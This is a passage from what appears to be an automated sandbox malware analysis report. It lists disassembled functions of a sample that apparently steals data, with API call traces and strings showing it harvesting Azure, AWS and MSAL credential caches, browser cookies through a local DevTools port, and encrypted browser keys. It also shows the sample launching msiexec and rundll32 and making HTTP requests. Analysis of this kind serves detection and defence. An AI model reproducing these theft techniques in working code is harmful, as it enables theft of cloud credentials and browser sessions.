                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                            • String ID:
                            • API String ID: 3744635739-3916222277
                            • Opcode ID: f86441c32b78ca11d27e71ac34e8933af5549f520d9599cdd1957eef4efb96d3
                            • Instruction ID: 25f11ebbddb7a1faa3f0b9e874109df70d4b3fb6fab05f4df59de08c6903b1ce
                            • Opcode Fuzzy Hash: f86441c32b78ca11d27e71ac34e8933af5549f520d9599cdd1957eef4efb96d3
                            • Instruction Fuzzy Hash: 74E11C72940108ABDB15EBA4DCA6FEEBB79FF54300F004199F50663192EF386A49DF61
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            • RegOpenKeyExA.ADVAPI32(00000000,0098AB00,00000000,00020019,00000000,00F505BE), ref: 00F48534
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00F485B6
                            • wsprintfA.USER32 ref: 00F485E9
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00F4860B
                            • RegCloseKey.ADVAPI32(00000000), ref: 00F4861C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00F48629
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 3246050789-3278919252
                            • Opcode ID: ed373af095cc6782bb5853f19266b7a33a96dafeacaecfbb02d349413c6f8f41
                            • Instruction ID: b804a51baad8511a63a055dd0ac3b43e839b36e4213fc49498d3d800bb1e8a46
                            • Opcode Fuzzy Hash: ed373af095cc6782bb5853f19266b7a33a96dafeacaecfbb02d349413c6f8f41
                            • Instruction Fuzzy Hash: 8D814071910118ABEB24DB54CD95FEEB7B8FF48300F1082D8E509A6181DF746B85DFA0
                            APIs
                              • Part of subcall function 00F48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F48F9B
                            • lstrcat.KERNEL32(?,00000000), ref: 00F45000
                            • lstrcat.KERNEL32(?,\.azure\), ref: 00F4501D
                              • Part of subcall function 00F44B60: wsprintfA.USER32 ref: 00F44B7C
                              • Part of subcall function 00F44B60: FindFirstFileA.KERNEL32(?,?), ref: 00F44B93
                            • lstrcat.KERNEL32(?,00000000), ref: 00F4508C
                            • lstrcat.KERNEL32(?,\.aws\), ref: 00F450A9
                              • Part of subcall function 00F44B60: StrCmpCA.SHLWAPI(?,00F50FC4), ref: 00F44BC1
                              • Part of subcall function 00F44B60: StrCmpCA.SHLWAPI(?,00F50FC8), ref: 00F44BD7
                              • Part of subcall function 00F44B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00F44DCD
                              • Part of subcall function 00F44B60: FindClose.KERNEL32(000000FF), ref: 00F44DE2
                            • lstrcat.KERNEL32(?,00000000), ref: 00F45118
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00F45135
                              • Part of subcall function 00F44B60: wsprintfA.USER32 ref: 00F44C00
                              • Part of subcall function 00F44B60: StrCmpCA.SHLWAPI(?,00F508D3), ref: 00F44C15
                              • Part of subcall function 00F44B60: wsprintfA.USER32 ref: 00F44C32
                              • Part of subcall function 00F44B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00F44C6E
                              • Part of subcall function 00F44B60: lstrcat.KERNEL32(?,0098E470), ref: 00F44C9A
                              • Part of subcall function 00F44B60: lstrcat.KERNEL32(?,00F50FE0), ref: 00F44CAC
                              • Part of subcall function 00F44B60: lstrcat.KERNEL32(?,?), ref: 00F44CC0
                              • Part of subcall function 00F44B60: lstrcat.KERNEL32(?,00F50FE4), ref: 00F44CD2
                              • Part of subcall function 00F44B60: lstrcat.KERNEL32(?,?), ref: 00F44CE6
                              • Part of subcall function 00F44B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00F44CFC
                              • Part of subcall function 00F44B60: DeleteFileA.KERNEL32(?), ref: 00F44D81
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 949356159-974132213
                            • Opcode ID: a3839b59d02839d08e6e590d5fe7e999fe85bf5b20afd6cfd5e2c3fadd71274a
                            • Instruction ID: 7c1c11748e218c27ba8b79d8526f0f9a1f815e0d411cd4f54ac69d72ca1e862f
                            • Opcode Fuzzy Hash: a3839b59d02839d08e6e590d5fe7e999fe85bf5b20afd6cfd5e2c3fadd71274a
                            • Instruction Fuzzy Hash: 2741C6BA94020467DB60F770EC9BFED3738AB54701F000554BA89650C2EEB8A7CCDB92
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00F491FC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateGlobalStream
                            • String ID: image/jpeg
                            • API String ID: 2244384528-3785015651
                            • Opcode ID: ca0b6314e05d1be336047ba525c899c6d86be3e84ca4dc7d16ca943b7148a481
                            • Instruction ID: 9a3087f8b4975ce83e5c765d342be35ae51b0ed673f404707a17326d10f4339a
                            • Opcode Fuzzy Hash: ca0b6314e05d1be336047ba525c899c6d86be3e84ca4dc7d16ca943b7148a481
                            • Instruction Fuzzy Hash: 0871C075A10208AFDB14DFE4EC89FEEBB79BF48700F108608F556A7285DB74A904DB60
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00F43415
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00F435AD
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00F4373A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell$lstrcpy
                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                            • API String ID: 2507796910-3625054190
                            • Opcode ID: a30cec8c09ddc2ffaf22b2c70feb2489647ac618256de3b5faac8748c6661bec
                            • Instruction ID: e68a05396bbc2229f7bffbfc6142146455725eb991dfa8f5a3734910e3815014
                            • Opcode Fuzzy Hash: a30cec8c09ddc2ffaf22b2c70feb2489647ac618256de3b5faac8748c6661bec
                            • Instruction Fuzzy Hash: 65124F719401189BEB15FBA0DDA2FEDBB39EF54300F004199F90666192EF386B49DF62
                            APIs
                              • Part of subcall function 00F39A50: InternetOpenA.WININET(00F50AF6,00000001,00000000,00000000,00000000), ref: 00F39A6A
                            • lstrcat.KERNEL32(?,cookies), ref: 00F39CAF
                            • lstrcat.KERNEL32(?,00F512C4), ref: 00F39CC1
                            • lstrcat.KERNEL32(?,?), ref: 00F39CD5
                            • lstrcat.KERNEL32(?,00F512C8), ref: 00F39CE7
                            • lstrcat.KERNEL32(?,?), ref: 00F39CFB
                            • lstrcat.KERNEL32(?,.txt), ref: 00F39D0D
                            • lstrlen.KERNEL32(00000000), ref: 00F39D17
                            • lstrlen.KERNEL32(00000000), ref: 00F39D26
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                            • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                            • API String ID: 3174675846-3542011879
                            • Opcode ID: 3aa0b251e6b5a75aa433def5cc985051b08bf0742968c59efc27990bae1ff5ea
                            • Instruction ID: f984ffdef7fc9cd03c36a8651b7bb8250aaceffc167971d8bb8037cab59e0a43
                            • Opcode Fuzzy Hash: 3aa0b251e6b5a75aa433def5cc985051b08bf0742968c59efc27990bae1ff5ea
                            • Instruction Fuzzy Hash: E75154B1C10608ABDB14EBE0DC99FEE7738AF14311F404658F60AA7085EF74AA49DF61
                            APIs
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                              • Part of subcall function 00F362D0: InternetOpenA.WININET(00F50DFF,00000001,00000000,00000000,00000000), ref: 00F36331
                              • Part of subcall function 00F362D0: StrCmpCA.SHLWAPI(?,0098E540), ref: 00F36353
                              • Part of subcall function 00F362D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F36385
                              • Part of subcall function 00F362D0: HttpOpenRequestA.WININET(00000000,GET,?,0098DA70,00000000,00000000,00400100,00000000), ref: 00F363D5
                              • Part of subcall function 00F362D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F3640F
                              • Part of subcall function 00F362D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F36421
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F45568
                            • lstrlen.KERNEL32(00000000), ref: 00F4557F
                              • Part of subcall function 00F48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F48FE2
                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00F455B4
                            • lstrlen.KERNEL32(00000000), ref: 00F455D3
                            • lstrlen.KERNEL32(00000000), ref: 00F455FE
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 3240024479-1526165396
                            • Opcode ID: 98f4f14a44b8ef28ecd399ee8b68b967b93658cb22cab9bc47fde9adc3c748a6
                            • Instruction ID: 263536b0ba4954c9b3ccb8198aba7f2588d16453b6effbf781dd16b7868117aa
                            • Opcode Fuzzy Hash: 98f4f14a44b8ef28ecd399ee8b68b967b93658cb22cab9bc47fde9adc3c748a6
                            • Instruction Fuzzy Hash: 16513C30950508DBEB14FF60CDA6AED7B39AF50385F504458FD0A57592EF38AB08EB62
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 30cc2d6e7f18c792a8486da2cdcf75d616050bdf7e9b760d0a19bb128664428b
                            • Instruction ID: 1ae223669a93eef1338a86d74bdc89f243c661fbd4eda1f8d92a13bbb21fcd07
                            • Opcode Fuzzy Hash: 30cc2d6e7f18c792a8486da2cdcf75d616050bdf7e9b760d0a19bb128664428b
                            • Instruction Fuzzy Hash: A5C1C4B5D40219ABCB14EF60DC99FEE7778BF54304F004598F90967242EA74EA85DF90
                            APIs
                              • Part of subcall function 00F48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F48F9B
                            • lstrcat.KERNEL32(?,00000000), ref: 00F4453C
                            • lstrcat.KERNEL32(?,0098DF38), ref: 00F4455B
                            • lstrcat.KERNEL32(?,?), ref: 00F4456F
                            • lstrcat.KERNEL32(?,0098CDC0), ref: 00F44583
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F48F20: GetFileAttributesA.KERNEL32(00000000,?,00F31B94,?,?,00F5577C,?,?,00F50E22), ref: 00F48F2F
                              • Part of subcall function 00F3A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00F3A489
                              • Part of subcall function 00F3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F3A13C
                              • Part of subcall function 00F3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F3A161
                              • Part of subcall function 00F3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00F3A181
                              • Part of subcall function 00F3A110: ReadFile.KERNEL32(000000FF,?,00000000,00F3148F,00000000), ref: 00F3A1AA
                              • Part of subcall function 00F3A110: LocalFree.KERNEL32(00F3148F), ref: 00F3A1E0
                              • Part of subcall function 00F3A110: CloseHandle.KERNEL32(000000FF), ref: 00F3A1EA
                              • Part of subcall function 00F49550: GlobalAlloc.KERNEL32(00000000,00F4462D,00F4462D), ref: 00F49563
                            • StrStrA.SHLWAPI(?,0098DF68), ref: 00F44643
                            • GlobalFree.KERNEL32(?), ref: 00F44762
                              • Part of subcall function 00F3A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F34F3E,00000000,00000000), ref: 00F3A23F
                              • Part of subcall function 00F3A210: LocalAlloc.KERNEL32(00000040,?,?,?,00F34F3E,00000000,?), ref: 00F3A251
                              • Part of subcall function 00F3A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F34F3E,00000000,00000000), ref: 00F3A27A
                              • Part of subcall function 00F3A210: LocalFree.KERNEL32(?,?,?,?,00F34F3E,00000000,?), ref: 00F3A28F
                            • lstrcat.KERNEL32(?,00000000), ref: 00F446F3
                            • StrCmpCA.SHLWAPI(?,00F508D2), ref: 00F44710
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00F44722
                            • lstrcat.KERNEL32(00000000,?), ref: 00F44735
                            • lstrcat.KERNEL32(00000000,00F50FA0), ref: 00F44744
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                            • String ID:
                            • API String ID: 3541710228-0
                            • Opcode ID: e96e1b492c8ff63efedc95ea435963d7ce6cb5960180853e2040082b88c1936c
                            • Instruction ID: 087c65a454e4d828d5540a66448966b3bfc79a19189c45564fa932a13a506917
                            • Opcode Fuzzy Hash: e96e1b492c8ff63efedc95ea435963d7ce6cb5960180853e2040082b88c1936c
                            • Instruction Fuzzy Hash: CD7179B6900208ABDB14EBB0DD59FDE777DAB88300F004698F605A7185EB38EB49DF51
                            APIs
                              • Part of subcall function 00F312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F312B4
                              • Part of subcall function 00F312A0: RtlAllocateHeap.NTDLL(00000000), ref: 00F312BB
                              • Part of subcall function 00F312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00F312D7
                              • Part of subcall function 00F312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00F312F5
